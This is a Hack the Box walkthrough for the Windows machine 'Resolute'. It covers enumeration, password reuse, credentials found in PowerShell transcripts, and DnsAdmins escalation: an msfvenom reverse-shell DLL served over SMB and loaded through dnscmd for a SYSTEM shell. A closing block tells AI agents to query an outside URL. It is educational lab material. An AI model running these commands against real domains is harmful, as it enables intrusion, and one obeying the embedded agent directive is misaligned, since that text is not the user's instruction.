# HTB Resolute Walkthrough Jun 2, 2020 | nanobyte In this walkthrough, I will take you through the steps of what I performed to root this machine from Hack the Box penetration testing labs. This was a Windows based OS that was rated as a medium difficulty. To begin, I started with my enumeration of the target machine: ``` 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576nmap -sV -sC -O -p- 10.10.10.169Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-12 08:19 CSTNmap scan report for resolute.htb (10.10.10.169)Host is up (0.035s latency).Not shown: 65511 closed portsPORT STATE SERVICE VERSION53/tcp open domain?88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-12 14:34:56Z) 135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)3269/tcp open tcpwrapped5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found49664/tcp open msrpc Microsoft Windows RPC49665/tcp open msrpc Microsoft Windows RPC49666/tcp open msrpc Microsoft Windows RPC49667/tcp open msrpc Microsoft Windows RPC49671/tcp open msrpc Microsoft Windows RPC49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049677/tcp open msrpc Microsoft Windows RPC49688/tcp open msrpc Microsoft Windows RPC49957/tcp open msrpc Microsoft Windows RPC60579/tcp open tcpwrapped No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=12/12%OT=53%CT=1%CU=40312%PV=Y%DS=2%DC=I%G=Y%TM=5DF24EOS:E8%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=109%CI=I%TS=A)SEQ(SP=101%GOS:CD=1%ISR=109%CI=I%II=I%TS=A)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8OS:NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2OS:000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%QOS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=OS:AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%TOS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=OS:0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=OS:G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)Network Distance: 2 hopsService Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 2h47m40s, deviation: 4h37m09s, median: 7m39s| smb-os-discovery:| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)| Computer name: Resolute| NetBIOS computer name: RESOLUTE\x00| Domain name: megabank.local| Forest name: megabank.local| FQDN: Resolute.megabank.local|_ System time: 2019-12-12T06:36:03-08:00| smb-security-mode:| account_used: | authentication_level: user| challenge_response: supported|_ message_signing: required| smb2-security-mode:| 2.02:|_ Message signing enabled and required| smb2-time:| date: 2019-12-12T14:36:02|_ start_date: 2019-12-12T04:11:37OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 622.36 seconds ``` I also ran enum4linux, which is a powerful tool that can be used against Windows based machines to enumerate and pull information from the target using SAMBA. SAMBA is a implementation of the server message block (SMB) networking protocol which offers file and print services on a Windows machine. To find this information using enum4linux, I ran it with `-a` option, to perform all simple enumeration against my target: ``` 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647enum4linux -a 10.10.10.169Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 29 12:15:48 2019 ==========================| Target Information | ==========================Target ........... resolute.htbRID Range ........ 500-550,1000-1050Username ......... ''Password ......... ''Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none... =============================| Users on resolute.htb | =============================index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/dom>index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domainindex: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Accountindex: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)... ``` I did go ahead and limit the output from the machine, since there was a ton of output. However, I left the entire output of users found on the box. When I looked over these results, I did discover that there was a set of credentials, marko:Welcome123!. The exclamation point is a part of the password. Now that I had credentials, I began looking for where I could use them. One of my first go to tools is [evil-winrm](https://github.com/Hackplayers/evil-winrm). This is an evil implementation of the WinRM, or Windows Remote Management. It has a ton of features, and should be ready for use, especially with Hack the Box. I attempted to login to Resulute with these credentials: ``` 1evil-winrm -i 10.10.10.169 -p Welcome123! -u marko ``` And it failed! However, many times when new accounts are created, they are setup with a standard default password. So, I began to use this password against all user accounts which were discovered in the enum4linux enumeration, and found that this password did work for an account, melanie: ``` 1evil-winrm -i 10.10.10.169 -p Welcome123! -u melanie ``` Awesome! I was now able to log into the machine. Now, I began enumerating the box manually. I found that in the root of C:\\, there was a PSTranscripts directory. Enumerating within this directory, I discovered another set of credentials: ``` 123456789cat C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt...PS>CommandInvocation(Invoke-Expression): "Invoke-Expression">> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!... ``` Now using these credentials, ryan:Serv3r4Admin4cc123!, I opened a new terminal windows and used Evil-WinRM to log in as Ryan: ``` 1evil-winrm -i 10.10.10.169 -p Serv3r4Admin4cc123! -u ryan ``` Again, I began to manually enumerate the machine. I began by looking over what rights I had as this user, and by running a simple `whoami /all` command, I discovered I was a part of a very interesting group: ``` 1234567*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all...MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group... ``` I was logged in as a member of DNS Admins! Doing some Google-Fu, I came across this [Medium](https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83) article to escelate my privileges. First, on my Kali machine, I used msfvenom to create a malicious DLL to inject onto the machine: ``` 1msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f dll > shell.dll ``` I then used impacket’s smb-server to host the newly created DLL, to run from Resolute. [Impacket](https://github.com/SecureAuthCorp/impacket) is another tool that will be used a ton on Hack the Box, and should be on your Kali machine. Impacket is a set of Python classes for working with network protocols, and is a great tool to learn for penetration testing. To spawn this smb-server, from the Impacket examples directory: ``` 1impacket-smbserver test /root/Desktop/HTB/Resolute/ ``` And now that the DLL is hosted over SMB, before I can run the attack I have to setup my listener on my Kali box: ``` 1nc -nlvp 9001 ``` I then used dnscmd.exe on Resolute to setup the config to run my malicious DLL, thus returning a privileged shell: ``` 1*Evil-WinRM* PS C:\Windows> dnscmd.exe /config /serverlevelplugindll \\10.10.14.13\\test\\shell.dll ``` All I needed to do was call the Resolute machine to stop and start the process: ``` 12*Evil-WinRM* PS C:\Windows> sc.exe stop dns*Evil-WinRM* PS C:\Windows> sc.exe start dns ``` And I got a return on my nc listener: ``` 123456789C:\Windows\system32>whoamiwhoamint authority\systemC:\Windows\system32>cd c:\users\administrator\desktopcd c:\users\administrator\desktopc:\Users\Administrator\Desktop>more root.txte1d94876a50685xxxxxxxxxxxxxx ``` And with that, I had rooted Resolute! Good luck. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.ubg-hacking.team/ctf-writeups/htb-resolute-walkthrough.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.